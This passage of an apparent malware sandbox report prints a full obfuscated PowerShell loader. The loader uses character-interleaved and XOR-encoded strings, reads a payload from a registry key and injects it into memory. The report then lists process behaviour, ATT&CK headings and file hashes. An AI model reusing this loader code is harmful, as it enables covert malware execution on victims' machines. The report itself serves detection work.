a3AbBAn7SrBNe1Nu9UnEGaEBeADiECrABaEGrABe'Li;la&sp(Sc`$CySFotPrrSuaWofNyfFdaVasTitGesMotCatMaeOplBusEneKo7Op)Th Ny`$KeMtiakvcPehNoiSvcMaoRolBoaFatSeeSydFa6Om;Fo`$MocFdiLicMaaAdlPraGosno Pa=Fe WefankSlpAr Hj`$OvSNotByrBaaPlfAgfBoaStsDetHysnotSotJaeEllMesbiePi5Ud Aj`$UgSditTarCaahefMifAnaTisMrtOvsCrtBetDeeNolSnstheKo6Po;Sa`$crMBlaDicThhSniLicReoFilPnaPrtHbeCadsm7No Bl=To AlHCeTtoBSh tr'SeEFo7Tr8Fo7BrABu2SoBDr7inACa2RaAdiCReBFr5ReABe6MoBBo1CaAHo5HoBFr1InBCr0TeAFlFTrAFl6TrBUn1lyFBr0GeENi3AnFMiEPaESt3OvERk7Ec8skBElAEu2MaALeFAsAGrFAsATeCStAfe6UnAPa7FlEAsDFo8AnAFiAUnDOpBHa5SaASuCLoAcy8PrALy6UnEReBst9Fe8su8BiAInATuDDiBve7Gl9Ha3MeBBi7StBIn1Ma9AnECuFSo9TiFbo9Ra9De9AfAFl6HeBCh1UaANyCFuEAgFbeEAs3LiFRe0FeFVi6JeFerBAuEStFFoENo3idFBl3LsBPrBExFPi0upFKa3RoFDo3GoFLa3RnEUnFTrEFi3AcFTh3EmBOpBMiFOv7MrFSt3NeEPhASa'Gd;Be&La(Ra`$CoSCatCirMeaMufUnfReaArsKltensEqtTitUpeSilResirein7Af)Sa Sp`$OvMStaVecPahBeiCacDeoSulTaaButGaeRedMo7Bl;Fe`$KoMNoaDucBlhUdiLacPloKllTrakatKoePldPo8Ti Ha=Tr CiHBrTBoBBy Sn'GeEAe7ti8TjDUnAAl6frAPa4BaBHe1LaAInAUnBor7SkASkASeAPe0MuEIn3LoFTrERiEDa3CaEAy7Ar8GrBEmAla2BoADeFSeAStFPrAVaCEmAsp6ruAde7PrEKnDHy8BuAInAJaDBeBRe5spAAlCFiAJa8EnAAf6PaEdeBBr9Ap8Ma8MuAPoAUfDTiBSl7Ut9Da3ReBAl7ClBan1Sk9brEStFCr9BrFEx9Au9mo9EnADe6CrBOr1PoAOrCnoEFaFFaERe3HaFKy3ErBTuBAfFan2UnFMa3InFHy3TiFBa3BoFPe3JdFTo3GlEFlFOrEBi3NuFMa3VaBcoBSnFFi0GuFNo3NiFFa3SeFKr3AgESyFSeEUn3CeFTa3AaBCrBEnFBa7SuENoASu'Al;Ca&Ls(Ce`$BrSWatKdrOuaRefUnfSkaPosSptnesAmtSptFaeSelBesSueEc7Ar)Hi Ca`$FoMUdaFocCohCaiAlcudoCylseaAftGeeNadDy8Ch;an`$alMByumumtplPreAfdSneFe=Sk(PrGAneVatHu-ReIMitLeeDemViPElrBooSppSieOgrHotRayFa ny-enPdrafitRohKv Ex'BeHReKFoCAcUFr:En\PaQTiuSkaManNatBeiUncImofo\FeSNeaPluTilFogTreSa'Sk)Bo.CaNBreFodTirNoyDekStnFliTinHugKv;Ru`$AvMKraUncBrhEmiVocSloRulVaaHytIneundCo9Va Ly=Fu GnHdiTKiBCa No'PrESk7Un8PoEErARe2TiASm0PoAKoBMeACoAUnASa0NoAUnCCeACyFMeASh2VeBpo7AdACh6poApo7PlENo3LeFDaEIsESa3Sp9Wh8In9Ov0deBFoABeBSe0HuBTr7GlAPo6ItAmeECeEInDTu8Ti0riADyCHeAFoDMaBKn5kaAUn6FoBVi1NoBOu7Pr9TrEwaFBl9hoFIn9In8Hy5poBHu1FiATaCRoAAcEOp8El1FaATe2SkBAr0TrAbl6FoFCo5AlFpr7Ca9Co0SaBIn7BrBsy1RaAPaADoAunDInAPi4TiEFoBStEBr7Po8meEMoBfo6FeAAjEWaAEyFPhAAd6TuATa7VeAZi6TiEReAGa'Do;st&Ti(Bi`$FeSDatRarAbaGrfMafLoaOusAatFrsUntRetUneArlTusUdeAf7De)Br Fe`$SlMAgaCocPrhSuihicIdoNolAramitMeeEndNe9Ba;De`$GlMHiuHymHelDaeDadStePu0Am Ch=Mu KiHEmTSnBTa Ri'So9Tr8Pu9Uo0inBHeABiBMy0AuBSe7BiAAn6InAImEReEEtDHe9Fo1inBls6TaATaDHoBLu7AnADrACrACuEWiAUd6WiETrDIr8KuASvAGaDTeBVi7ChAFo6GaBTi1SaAreCNoBPa3Mo9Te0DaAAg6geBTv1wyBFi5CaAOpANeAGa0AfAFo6SkBLi0TeEvaDcy8AnEFiADi2LaBPr1LeBFe0FrASyBBeASt2coAIdFta9ReEChFBo9MaFSc9Pr8Sl0ElANoCSkBgr3SvBGrASuESaBUnENs7He8PoEVvAIm2DrAUd0DeANoBStAChAToAFo0StAFlCneAOvFFoAWh2KrBLe7LgAEy6LuAFr7PrESeFAmECi3ToFdi3SiERoFSoEtr3ToERr3TeEPh7Hy8kr7InASt2KvBHy7EmAIn2GeAImCSuBFu5BlAGi6KiBDi1HeAun5CaBZe1UtBap0GoAJoFHiARe6WiBAr1SmFPe0BrEYmFovECo3raFvr0PhFUn6ouFStBtrEHaASy'Re;co&Re(Ch`$BaSKotAnrMaaTefVafFraStsFitAasPrtFotCaeFolUdsRaeBa7Bl)Sk Bz`$GuMNyuFemAslKveMidEkeIn0Ch;te`$TeSJvmEkaSilMolAwmPboanuPrtRehnueCodSy=el`$TrMStaStcJahHriuncCyoBelTeakrtDdeMadmr.PrcInobluSpnAgtpa-Ne3Ne5Un8pu;Or`$EnMCuuDrmInlAfeEndKaeAt1In Sh=Er ElHAnTspBSa Ac'se9Gr8Ja9No0AcBBiAPeBDr0SkBFl7PrASh6BaAfaERaEdeDGr9Ve1DoBUn6BuAWeDStBUn7StAFjALeAChEbaAAu6ReEOtDOc8DrABeAEmDFaBAp7ViAGa6TiBDe1KeAUnCgeBOm3Ly9Ud0ReAPr6maBSo1BeBVi5KkACuABiAEu0CeARe6PuBun0IrELeDTi8VeEUnARn2CuBIl1DeBFo0StASuBunAYa2AlAArFel9DeEOrFUb9StFHu9Ge8Ly0BuAFoCexBUe3CoBGrAFrEAaBBiERe7Gn8EsEAuAPu2MaASt0StADuBSkAfoATeATo0PrAScCEsAHuFplABy2SuBDd7VeACy6MaAMo7HiENeFStEKr3akFPi0ArFKa6MoFUdBLiEHeFDiEbi3BoEIn7Ti8FoDpiApr6WuANg4SpBBy1opAInALeBBa7NrAAbAstABa0ArEunFLgEOv3StEQu7Af9Fa0KrACoEDyAor2InASyFWoAFoFBeAOrESpATeCMaBri6anBTr7HuAVaBcrAGa6SiASu7NoESpAOp'So;Dd&Ud(Al`$AuSFotDirSyarefRefFaaPrsMatNasSltSctHoeJulSisLyere7We)Ne Si`$FrMCouSumDeloxeSudCyeLa1Va;be`$TeMTiuExmHilBoeFadAseSk2en Ve=Le UnHQuTPrBAn Is'DeESy7cu9Wr3SuANoCFlBDh0PhBPr7TrBAr3BeBNo1TrAVoCMaBKa3SeAFuBPeAPu6ChBBl0TuBKaAUnEDe3vaFFjEHaERe3Br9Fo8Ho9Ex0SpBAdADiBSt0MiBDe7TiASk6enADoERaEStDAf9Qu1DeBLi6HvAAtDLaBFo7MeACoAToABlEStASy6PhEFiDUn8HnAHoAPlDGoBVi7GeAme6GrBNo1BeAWiCViBMu3pa9Go0TrAJa6SiBFu1PeBSi5CoAksAIsATe0BrAAr6VoBDe0PeEDeDHy8QuEBrASq2PrBAn1KaBCa0veABaBSaAKe2SpALiFde9KoEYnFEn9FoFNe9Ne8Su4AsANy6AnBDe7In8Re7UdAEf6BeAGuFfoAbo6FrAEi4ScAOp2KiBCh7MoAUd6Gi8Fo5UdAmeCKoBUl1op8Re5SeBCh6BiAHaDTvAPa0FoBUo7VaAPrABeAafCNoAKoDAu9Pl3SeAUnCSaAGiAObACoDThBGe7DrAVe6AfBTi1inEBlBSaEFo7Un8gr7blATa2MiBDd7DeADi2HaAPaCStBSl5CrAAr6AcBEn1BlAOm5PrBPr1MeBNe0PtAJaFThAal6DeBPa1ObFEr0PaEIcFWeEDe3SkECoBMo8Un4Po8Kr7Ge9Br7MyEBo3Ch8Ca3TiEBaBIn9Ec8Bu8HyALuALaDRaBVa7Sy9Rh3shBAs7BeBGe1un9TaETiEHjFWe9De8Au8DoAslAMyDDoBJo7Le9ra3OcBSt7BrBSk1Ub9MoETrEPaAUlETy3PaEMiBTr9No8Wr9Jo5UnAJaCRiABrAgrAHe7Ch9ExEToEPuAOvEOpATrESuADi'Ka;At&Ki(Ek`$KlSektStrSaaBafPafBraDasTetSlsSktMetheeOrlFesOreSt7Si)Lo Af`$ClMBruTemAvlHeeVidSueIn2Sp;Ur`$HyMFruFomSllCleDidHeeSl3Br Ap=Po DiHPaTUnBAn Cr'FrEFr7Pa9fo3UrAHeCSkBSp0DeBSl7DiBFr3ElBAu1RaAAnCStBIn3ReAMoBUnABe6PrBBr0BaBKuAHeECaDSt8RuAOmAmoDObBKo5SkApeCJiAAn8MiAAt6LkEPlBUnEHj7Ps8ViDFiACi6LiASk4SoBsu1GeAPrACaBBa7KoAFoARoASp0baEDdFNaELo7ElAFl0UnACaAAnADi0CoABl2ReAAfFBrAsc2EnBAd0AfESeATu'Af;ya&Ty(Su`$BaSMntUmrKaaThfPifSnaTrsTatStsMutLatkaeurlUnsBoeJo7Be)Bl Sp`$SpMUnuFrmstlAbeSadSyeOb3Bi#Sl;""";Function Mumlede9 { param([String]$Skrminddelingers); For($Bleblomst121=2; $Bleblomst121 -lt $Skrminddelingers.Length-1; $Bleblomst121+=(2+1)){ $Muddergrfters = $Muddergrfters + $Skrminddelingers.Substring($Bleblomst121, 1); } $Muddergrfters;}$Erotiseringer2460 = Mumlede9 'AvIWaEAvXBa ';$Erotiseringer2461= Mumlede9 $redans;if([IntPtr]::size -eq 8){start-job { param($Stteskippernes) powershell $Stteskippernes } -RunAs32 -Argument $Erotiseringer2461 | wait-job | Receive-Job;}else{&$Erotiseringer2460 $Erotiseringer2461;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4228
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Skrminddelingers); $Stteskipperneschenia24 = New-Object byte[] ($Skrminddelingers.Length / 2); For($Bleblomst121=0; $Bleblomst121 -lt $Skrminddelingers.Length; $Bleblomst121+=2){ $Stteskipperneschenia24[$Bleblomst121/2] = [convert]::ToByte($Skrminddelingers.Substring($Bleblomst121, 2), 16); $Stteskipperneschenia24[$Bleblomst121/2] = ($Stteskipperneschenia24[$Bleblomst121/2] -bxor 195); } [String][System.Text.Encoding]::ASCII.GetString($Stteskipperneschenia24);}$Aftenkjolers0=HTB '90BAB0B7A6AEEDA7AFAF';$Aftenkjolers1=HTB '8EAAA0B1ACB0ACA5B7ED94AAADF0F1ED96ADB0A2A5A68DA2B7AAB5A68EA6B7ABACA7B0';$Aftenkjolers2=HTB '84A6B793B1ACA082A7A7B1A6B0B0';$Aftenkjolers3=HTB '90BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8BA2ADA7AFA691A6A5';$Aftenkjolers4=HTB 'B0B7B1AAADA4';$Aftenkjolers5=HTB '84A6B78EACA7B6AFA68BA2ADA7AFA6';$Aftenkjolers6=HTB '919790B3A6A0AAA2AF8DA2AEA6EFE38BAAA7A681BA90AAA4EFE393B6A1AFAAA0';$Aftenkjolers7=HTB '91B6ADB7AAAEA6EFE38EA2ADA2A4A6A7';$Aftenkjolers8=HTB '91A6A5AFA6A0B7A6A787A6AFA6A4A2B7A6';$Aftenkjolers9=HTB '8AAD8EA6AEACB1BA8EACA7B6AFA6';$Straffaststtelse0=HTB '8EBA87A6AFA6A4A2B7A697BAB3A6';$Straffaststtelse1=HTB '80AFA2B0B0EFE393B6A1AFAAA0EFE390A6A2AFA6A7EFE382ADB0AA80AFA2B0B0EFE382B6B7AC80AFA2B0B0';$Straffaststtelse2=HTB '8AADB5ACA8A6';$Straffaststtelse3=HTB '93B6A1AFAAA0EFE38BAAA7A681BA90AAA4EFE38DA6B490AFACB7EFE395AAB1B7B6A2AF';$Straffaststtelse4=HTB '95AAB1B7B6A2AF82AFAFACA0';$Straffaststtelse5=HTB 'ADB7A7AFAF';$Straffaststtelse6=HTB '8DB793B1ACB7A6A0B795AAB1B7B6A2AF8EA6AEACB1BA';$Straffaststtelse7=HTB '8A869B';$Straffaststtelse8=HTB '9F';function fkp {Param ($Flagelliform, $Tilmaalende) ;$Machicolated0 =HTB 'E78EA2A2A7A6B1B0E3FEE3EB9882B3B387ACAEA2AAAD9EF9F980B6B1B1A6ADB787ACAEA2AAADED84A6B782B0B0A6AEA1AFAAA6B0EBEAE3BFE394ABA6B1A6EE8CA1A9A6A0B7E3B8E3E79CED84AFACA1A2AF82B0B0A6AEA1AFBA80A2A0ABA6E3EE82ADA7E3E79CED8FACA0A2B7AAACADED90B3AFAAB7EBE790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6FBEA98EEF29EED86B2B6A2AFB0EBE782A5B7A6ADA8A9ACAFA6B1B0F3EAE3BEEAED84A6B797BAB3A6EBE782A5B7A6ADA8A9ACAFA6B1B0F2EA';&($Straffaststtelse7) $Machicolated0;$Machicolated5 = HTB 'E78CAEA8ACB0B7ADAAADA4B0ABA6ADB0BAADA6B7B0E3FEE3E78EA2A2A7A6B1B0ED84A6B78EA6B7ABACA7EBE782A5B7A6ADA8A9ACAFA6B1B0F1EFE39897BAB3A6989E9EE383EBE782A5B7A6ADA8A9ACAFA6B1B0F0EFE3E782A5B7A6ADA8A9ACAFA6B1B0F7EAEA';&($Straffaststtelse7) $Machicolated5;$Machicolated1 = HTB 'B1A6B7B6B1ADE3E78CAEA8ACB0B7ADAAADA4B0ABA6ADB0BAADA6B7B0ED8AADB5ACA8A6EBE7ADB6AFAFEFE383EB9890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8BA2ADA7AFA691A6A59EEB8DA6B4EE8CA1A9A6A0B7E390BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8BA2ADA7AFA691A6A5EBEB8DA6B4EE8CA1A9A6A0B7E38AADB793B7B1EAEFE3EBE78EA2A2A7A6B1B0ED84A6B78EA6B7ABACA7EBE782A5B7A6ADA8A9ACAFA6B1B0F6EAEAED8AADB5ACA8A6EBE7ADB6AFAFEFE383EBE785AFA2A4A6AFAFAAA5ACB1AEEAEAEAEAEFE3E797AAAFAEA2A2AFA6ADA7A6EAEA';&($Straffaststtelse7) $Machicolated1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Overpinching,[Parameter(Position = 1)] [Type] $Evolves = [Void]);$Machicolated2 = HTB 'E78EA2B2B6A6B7B7A6E3FEE39882B3B387ACAEA2AAAD9EF9F980B6B1B1A6ADB787ACAEA2AAADED87A6A5AAADA687BAADA2AEAAA082B0B0A6AEA1AFBAEBEB8DA6B4EE8CA1A9A6A0B7E390BAB0B7A6AEED91A6A5AFA6A0B7AAACADED82B0B0A6AEA1AFBA8DA2AEA6EBE782A5B7A6ADA8A9ACAFA6B1B0FBEAEAEFE39890BAB0B7A6AEED91A6A5AFA6A0B7AAACADED86AEAAB7ED82B0B0A6AEA1AFBA81B6AAAFA7A6B182A0A0A6B0B09EF9F991B6ADEAED87A6A5AAADA687BAADA2AEAAA08EACA7B6AFA6EBE782A5B7A6ADA8A9ACAFA6B1B0FAEFE3E7A5A2AFB0A6EAED87A6A5AAADA697BAB3A6EBE790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F3EFE3E790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F2EFE39890BAB0B7A6AEED8EB6AFB7AAA0A2B0B787A6AFA6A4A2B7A69EEA';&($Straffaststtelse7) $Machicolated2;$Machicolated3 = HTB 'E78EA2B2B6A6B7B7A6ED87A6A5AAADA680ACADB0B7B1B6A0B7ACB1EBE782A5B7A6ADA8A9ACAFA6B1B0F5EFE39890BAB0B7A6AEED91A6A5AFA6A0B7AAACADED80A2AFAFAAADA480ACADB5A6ADB7AAACADB09EF9F990B7A2ADA7A2B1A7EFE3E78CB5A6B1B3AAADA0ABAAADA4EAED90A6B78AAEB3AFA6AEA6ADB7A2B7AAACAD85AFA2A4B0EBE782A5B7A6ADA8A9ACAFA6B1B0F4EA';&($Straffaststtelse7) $Machicolated3;$Machicolated4 = HTB 'E78EA2B2B6A6B7B7A6ED87A6A5AAADA68EA6B7ABACA7EBE790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F1EFE3E790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F0EFE3E786B5ACAFB5A6B0EFE3E78CB5A6B1B3AAADA0ABAAADA4EAED90A6B78AAEB3AFA6AEA6ADB7A2B7AAACAD85AFA2A4B0EBE782A5B7A6ADA8A9ACAFA6B1B0F4EA';&($Straffaststtelse7) $Machicolated4;$Machicolated5 = HTB 'B1A6B7B6B1ADE3E78EA2B2B6A6B7B7A6ED80B1A6A2B7A697BAB3A6EBEA';&($Straffaststtelse7) $Machicolated5 ;}$Gastrocoloptosis = HTB 'A8A6B1ADA6AFF0F1';$Machicolated6 = HTB 'E78BA2AFAFACA6A7E3FEE39890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F984A6B787A6AFA6A4A2B7A685ACB185B6ADA0B7AAACAD93ACAAADB7A6B1EBEBA5A8B3E3E784A2B0B7B1ACA0ACAFACB3B7ACB0AAB0E3E790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F7EAEFE3EB848797E383EB988AADB793B7B19EEFE398968AADB7F0F19EEFE398968AADB7F0F19EEFE398968AADB7F0F19EEAE3EB988AADB793B7B19EEAEAEA';&($Straffaststtelse7) $Machicolated6;$cicalas = fkp $Straffaststtelse5 $Straffaststtelse6;$Machicolated7 = HTB 'E787A2B7A2ACB5A6B1A5B1B0AFA6B1F0E3FEE3E78BA2AFAFACA6A7ED8AADB5ACA8A6EB988AADB793B7B19EF9F999A6B1ACEFE3F0F6FBEFE3F3BBF0F3F3F3EFE3F3BBF7F3EA';&($Straffaststtelse7) $Machicolated7;$Machicolated8 = HTB 'E78DA6A4B1AAB7AAA0E3FEE3E78BA2AFAFACA6A7ED8AADB5ACA8A6EB988AADB793B7B19EF9F999A6B1ACEFE3F3BBF2F3F3F3F3F3EFE3F3BBF0F3F3F3EFE3F3BBF7EA';&($Straffaststtelse7) $Machicolated8;$Mumlede=(Get-ItemProperty -Path 'HKCU:\Quantico\Saulge').Nedrykning;$Machicolated9 = HTB 'E78EA2A0ABAAA0ACAFA2B7A6A7E3FEE39890BAB0B7A6AEED80ACADB5A6B1B79EF9F985B1ACAE81A2B0A6F5F790B7B1AAADA4EBE78EB6AEAFA6A7A6EA';&($Straffaststtelse7) $Machicolated9;$Mumlede0 = HTB '9890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F980ACB3BAEBE78EA2A0ABAAA0ACAFA2B7A6A7EFE3F3EFE3E3E787A2B7A2ACB5A6B1A5B1B0AFA6B1F0EFE3F0F6FBEA';&($Straffaststtelse7) $Mumlede0;$Smallmouthed=$Machicolated.count-358;$Mumlede1 = HTB '9890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F980ACB3BAEBE78EA2A0ABAAA0ACAFA2B7A6A7EFE3F0F6FBEFE3E78DA6A4B1AAB7AAA0EFE3E790AEA2AFAFAEACB6B7ABA6A7EA';&($Straffaststtelse7) $Mumlede1;$Mumlede2 = HTB 'E793ACB0B7B3B1ACB3ABA6B0BAE3FEE39890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F984A6B787A6AFA6A4A2B7A685ACB185B6ADA0B7AAACAD93ACAAADB7A6B1EBE787A2B7A2ACB5A6B1A5B1B0AFA6B1F0EFE3EB848797E383EB988AADB793B7B19EEF988AADB793B7B19EEAE3EB9895ACAAA79EEAEAEA';&($Straffaststtelse7) $Mumlede2;$Mumlede3 = HTB 'E793ACB0B7B3B1ACB3ABA6B0BAED8AADB5ACA8A6EBE78DA6A4B1AAB7AAA0EFE7A0AAA0A2AFA2B0EA';&($Straffaststtelse7) $Mumlede3#"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
3668a232a44c984b6b04c18ff37f3874

SHA1
a5eb11f1ed5008a2e27f73fdcc6f51b8182097f2

SHA256
5f84ea902ac918320e570c79f880716278708bb060d9899b5e5dca583067de57

SHA512
f672e715db54604dd73f2bcf30ba243a685353956fd9024cc6c486564daafd69df6901f745ade0469ea36fde0f99ecfff39a8309c6fc898a5d9cd28145de636b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
e43c0d9dcc5e3172f717ff80aaa66862

SHA1
6f9b8f17b196184a1607db46da194db9b30c72f4

SHA256
164af9f0bd9ce97e50932e32e01afb5706b96c9fb7ff7e97ea14a8c54df38f32

SHA512
256d043a806adadb70f0e58d6459a4793953de664d4efa2c1cd961c13abe0f985812febf23c7e74cd18d03476be70716c953825f4a47bcaa8435448b173aac54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
91ddf72182319070565b33fe637d06ca

SHA1
0d51dbe3baebfb00a0bdccce6151918bf3b08a30

SHA256
a14094a0c34a49e22307036d49dc26c040a9090ba45a95a6d67abfe9b4138efc

SHA512
5bd56afe7f2afb766d70ca819824afe9501151dc96b4ff713e9b080a11a57b5b4f2cffb088795afbc7347ca3048f955c72f6716afa381824daadab12e7c643f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
222fb043a8ff72ee67728314fad75c8b

SHA1
d1784373e65668468af79181f52c805f9b32de05

SHA256
e239dde7e12fc895968074099adffb7a661b08e377d1fef5952fc9157aea6ec2

SHA512
156de387bdd2593d0b576883a20e5e3c1a7e65794963df2e3b35d3dbfeb8081b921003fe82a25ce1f72fcf3f3b040d3d3d8d0762777ef003017f9a049f872264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
5e3f36ae1746bc3286759e1a79f98908

SHA1
4c46b424738962749378fe6f4490fc8d91ee0d9e

SHA256
ffe7432b2fa0ce4056da3e04de2c097627ffdd827cb048b5e32c6b57feef96db

SHA512
1ebb87ee15c9a9b99c005a10b1ccc251692d360b3644f4253a237f960d31c6249be63491cabdaff63cf1ab70ff90edc41be94512676dc6687b329ebe00766fd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
50KB

MD5
2cb3f528286df9feab019e0de2053b6a

SHA1
0d5835457f71fd6cdfa45e7280544142e35ad6fc

SHA256
bcdaef74a79cde95526e25c52de2623b0e2b2091a304e57db0cd7e640bb08943

SHA512
c466148cc9d282d02b5463c2ddd0d28c69a0e1715d4aae3bbf9874d39df6ffbc242f10be9d75b18c71d49626ae4f4bb6886f4955afced091e68590155a79e860

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
bb797830590e04a0146e1e6a44519319

SHA1
80ffbf357bef42be84ab5e78d96c4e4e66dbebb7

SHA256
95ddf6ccfb98f8644996f7969fa15e1a9069d106ab9d89ba0489786e119bf752

SHA512
117f175d9c4016e5d2727ea36e739028b8d894bbed3d19b49c056ed818b00f745995468fb5cb8b7275c9f533e40619648ff963887fb7b6f684846fda6574e38a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
d441bbabcc6aa24ebacc47dea14b2d99

SHA1
1302d4b20b019be7a129c54fb4332bd7273a5820

SHA256
724d807836fde0f2870d0017963c059c39fc1988cc2145259a62bea6c1c7614d

SHA512
14b7d76626e3d8bb1c8d64a1f6321d3c2fa2123bea3c3b8d8815f0c5579725dc89f85639c86fb8fbe7dbf202091e3f1fc6be7a2f75d86199a2f71e0955502f31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
bb86f0c198dda03f133106b49de37b8b

SHA1
7e3ad71b8ba5554db99005e454bd47d569d163d8

SHA256
4874ff1151c0fac45ccd3652d33f39efaa63cfb5c542d6524289d030e65e41ce

SHA512
c5916f2b2495b3fc71006431bb42b548e610682aeaa3626aab6fdefb657dce1d08188796da564eda9dcc784f855926e2745c3791507c38c35370a7e49c412091

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
b99739ea565ea6dfaa42a73d23cbeb00

SHA1
565063463f39f9b8710f9c9be17bce4dc695050d

SHA256
c034fa963585f876516e428cfd1f8ef9f1ae0d9d1102fe0835681f1f2f858a92

SHA512
fcd3ec09b64a95a8f1719a0aee1956e565d84aafe0329fcbc10a3d681894a918d809c44cba18da4a9fe73273d039b7d2d22bbf5b7d2e34117b9d2bc09e8dbd32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
fde553e9a6a4e67a044165286dc3c0f3

SHA1
55653e839a2ff2f95bd09806e5b46b779747cec9

SHA256
f981836a46ef7f02963249b43775e8e98ff3f9288ec4c387027fd49443d64f56

SHA512
5aead8729b145f83dad01f8345a0a895a12d91bc89796450ad462bb74403367ab60969c633ea6bccfc661151c1de692a1044b9995fe969c80aa502b28c80c9f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
da4b8a721e4617e836b6edc0ef175925

SHA1
9a3a7e0a857506b11782c4df807ec7b243d75dab

SHA256
dd7674933f957ca9fea46c5d07a832d5b24d9d71aeaf4d928ec7203f3bc86d34

SHA512
5dde332bf0d74adb7ca626d57e6761d6ceb62904866b06508bf3edb9f756062fa267d69d8f8152e421b1e500dd3a90fb4294eba237195aa012d4b355d5ee985b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
e1cf5d90c8063e9951c917f25a31025d

SHA1
e321eeb910ad9a2dbe8624554361803b6fe9bc98

SHA256
6cf3d81b152d1d7283cacf59d4206b6e78a8fce3845ca0be482309584fc10c6e

SHA512
d65b8486f5b44a46a867f841989201c230fe7060c0047607e04dfd358ad206f5fb2ab424668e3d1adba33feb8610476df38fe954e4417f7c7d4c688c3db3e269

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
f4f1b6bfbce915ad944e903799cb1c5a

SHA1
f47e92acedb1323cba8b0d5e21cb119a0693e5ca

SHA256
005c2b2078fb1ddc02c63094830463140e1a3698372967701589aed1b5886fea

SHA512
50927ca4f11bfd8b75b6531acc5acf492df8fe3b8103978dc884642405f6d5917750667667ed46cffac5e39c2adbc117d3ee4f5a3caee3bb338a7d81259bf313

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
47c9500c5083ba457063a90c2774db24

SHA1
a0592414b7a727dd7ae491beea9964e310aad1d7

SHA256
4313198b6e1e3a5791c84624e1af3a79cbd7ada8daa323d79081a292aacb7894

SHA512
e8aeeb0256cd1cbd21838babc39af575ef04d85322ab48d85853a85205ee2fd4e71e61ffeca5e20ee12e8876c46edad77e06e319334b5427982e666532e18d52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
4f941bea5281259e6501d1dcede72744

SHA1
b69e0b20c78aa18ea21546930ecfb08b6b04af24

SHA256
2a3e8a33ee77ae525634e6f63730e698c3f3532398c92c75004e9a049231fae5

SHA512
5564efcd30808ad439626f4d8d9208342a6b0958389e3fd98ad5b49f19c26f7a012ac4d6764f1ca61486b0a17e4555adc7606c166826044064b29bbfb94256ef

Download Submit
memory/2976-544-0x00000000099B0000-0x000000000A028000-memory.dmp

Filesize
6.5MB

Download
memory/2976-543-0x00000000099B0000-0x000000000A028000-memory.dmp

Filesize
6.5MB

Download
memory/2976-313-0x000000000ABB0000-0x000000000B0AE000-memory.dmp

Filesize
5.0MB

Download
